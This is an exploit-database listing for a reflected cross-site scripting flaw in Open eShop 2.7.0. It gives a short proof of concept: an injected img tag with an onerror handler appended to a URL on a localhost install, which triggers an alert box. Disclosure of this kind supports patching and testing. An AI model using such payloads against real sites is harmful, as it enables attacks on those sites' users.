[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Open eShop 2.7.0 Cross Site Scripting Vulnerability

Author
tmrswrr
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-39552
Category
web applications
Date add
12-04-2024
Platform
php
# Exploit Title: Open eShop Version : 2.7.0  - Reflected XSS
# Exploit Author: tmrswrr 
# Vendor Homepage: http://www.open-eshop.com/
# Version : 2.7.0

1 ) Go to home page https://127.0.0.1/Open_eShop
2 ) Write url this payload : test.html"><img src=x onerrora=confirm() onerror=confirm(1)>

3 ) After save it you will be see xss alert

https://127.0.0.1/Open_eShop/test.html"><img src=x onerrora=confirm() onerror=confirm(1)>

#  0day.today [2024-11-15]  #